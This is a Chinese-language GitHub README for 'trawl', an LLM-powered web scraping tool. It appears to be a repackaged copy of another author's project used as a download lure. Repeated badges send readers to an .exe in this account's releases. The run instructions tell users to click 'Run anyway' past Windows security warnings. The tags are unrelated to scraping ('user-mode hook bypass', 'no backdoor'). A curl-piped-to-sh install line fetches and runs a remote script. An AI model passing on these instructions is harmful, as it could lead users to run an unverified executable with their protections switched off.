teamn9636/trawl

GitHub: teamn9636/trawl

一款基于大语言模型的智能网页数据提取工具，无需编写选择器即可自动从网站抓取结构化数据并适应页面变更。

Stars: 0 | Forks: 0

# 🐟 trawl - 轻松提取网站数据 [![下载 trawl](https://img.shields.io/badge/Download-trawl-blue?style=for-the-badge&logo=github)](https://github.com/teamn9636/trawl/releases) ![trawl](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/7873e8d531182654.png) ## 📋 什么是 trawl？ Trawl 是一个从任何网站提取结构化数据的工具。你只需告诉它你想要*什么*信息，而不是*如何*找到这些信息。当网站发生变化时，trawl 会自动调整以持续准确地获取数据。它运行速度快，且不需要为每个页面额外调用 API。你不需要知道如何编写 CSS 选择器或代码。只需提供简单的指令，剩下的工作交给 trawl 即可。 ## 🖥️ 系统要求 Trawl 可在 Windows 10 及更新版本上运行。你的电脑应具备： - 64 位处理器 - 至少 4 GB 内存 (RAM) - 500 MB 的可用磁盘空间你还需要互联网连接来下载和运行程序，并允许其访问网站以提取数据。 ## 📥 下载和安装 [![下载 trawl](https://img.shields.io/badge/Download-trawl-green?style=for-the-badge&logo=windows)](https://github.com/teamn9636/trawl/releases) 要在 Windows 上开始使用 trawl，请访问下面的发布页面。页面会显示可供下载的最新版本。 **前往此处下载：** https://github.com/teamn9636/trawl/releases 寻找以 `.exe` 结尾的文件（这是 Windows 安装程序或可执行文件）。点击它进行下载。 ### 如何在 Windows 上运行 trawl 1. 从发布页面下载 `.exe` 文件。 2. 在你的下载文件夹中找到已下载的文件。 3. 双击文件打开。如果弹出安全警告，请选择“运行”或“更多信息”，然后选择“仍要运行”。 4. 程序将在新窗口或命令提示符中打开。运行 trawl 不需要安装额外的软件，但在其运行后，你需要打开命令提示符（或 PowerShell）。 ## 🚀 trawl 入门指南按照以下步骤从网站提取数据。 ### 步骤 1：打开命令提示符 - 按下 Windows 键。 - 输入 `cmd` 并按回车键。这将打开一个名为命令提示符的黑色窗口。 ### 步骤 2：设置你的 API key Trawl 使用大语言模型 (LLM) 来确定要提取的正确数据。你需要添加来自你 API 提供商的密钥。根据你使用的 AI 平台，输入以下命令（将 `YOUR_API_KEY` 替换为你的真实密钥）：对于 Google Gemini： ``` set GOOGLE_GEMINI_APIKEY=YOUR_API_KEY ``` 对于 Anthropic： ``` set ANTHROPIC_API_KEY=YOUR_API_KEY ``` 按回车键为当前会话保存密钥。 ### 步骤 3：使用网站 URL 运行 trawl 输入如下简单的命令来获取产品信息： ``` trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock" ``` 此命令要求 trawl 从示例网站获取产品标题、价格、评分和库存信息。 ### 步骤 4：将输出保存为 CSV（可选）如果你希望结果保存为 CSV 文件（便于在 Excel 中打开），请添加此标志 (flag)： ``` trawl "https://books.toscrape.com" --fields "title, price, rating, in_stock" --csv > products.csv ``` 这会将输出保存到你运行命令的文件夹中名为 `products.csv` 的文件里。 ## 🛠️ 功能一览 - 无需编写代码或 CSS 选择器。 - 网站更改时自动适应。 - 初始设置后运行速度快。 - 对每种网站布局仅使用一次 AI，节省时间和 API 用量。 - 完全在你的电脑上运行，确保数据抓取稳定。 - 支持输出为 JSON 和 CSV 格式。 - 适用于多种类型的网站和数据。 ## 🔧 更多安装方式（面向高级用户）如果你想以不同方式使用 trawl，可以通过其他方法安装或构建。 - 在 PowerShell 中运行此命令进行安装： ``` curl -fsSL https://raw.githubusercontent.com/akdavidsson/trawl/main/install.sh | sh ``` - 或者，如果你安装了 Go 编程语言，请运行： ``` go install github.com/akdavidsson/trawl@latest ``` - 从源代码构建： ``` git clone https://github.com/akdavidsson/trawl cd trawl go build -o trawl . ``` 对于大多数用户来说，下载并运行 `.exe` 文件是最简单的方法。 ## 🤔 故障排除与技巧 - 如果命令行提示“command not found”（找不到命令），请确保你是从 trawl 所在的文件夹运行命令，或者将 trawl 添加到系统 PATH 中。 - 除非将 API key 添加到系统环境变量中，否则每次打开命令提示符时都必须设置它。 - 在网站 URL 和字段周围使用引号以避免错误。 - 先尝试简单的网站以熟悉命令操作。 - 如果提取结果看起来不对，请检查你的 API key 和网站 URL。 ## 📚 了解更多有关详细的说明和高级选项，请查看官方 GitHub 仓库： https://github.com/teamn9636/trawl [![下载 trawl](https://img.shields.io/badge/Download-trawl-purple?style=for-the-badge&logo=windows)](https://github.com/teamn9636/trawl/releases)

标签：BSD, EVTX分析, Python, URL抓取, Web Scraping, Windows软件, 人工智能, 大模型, 数据抓取, 数据挖掘, 数据泄露, 数据清洗, 文档结构分析, 无后门, 日志审计, 用户模式Hook绕过, 结构化数据, 网页提取, 自适应抓取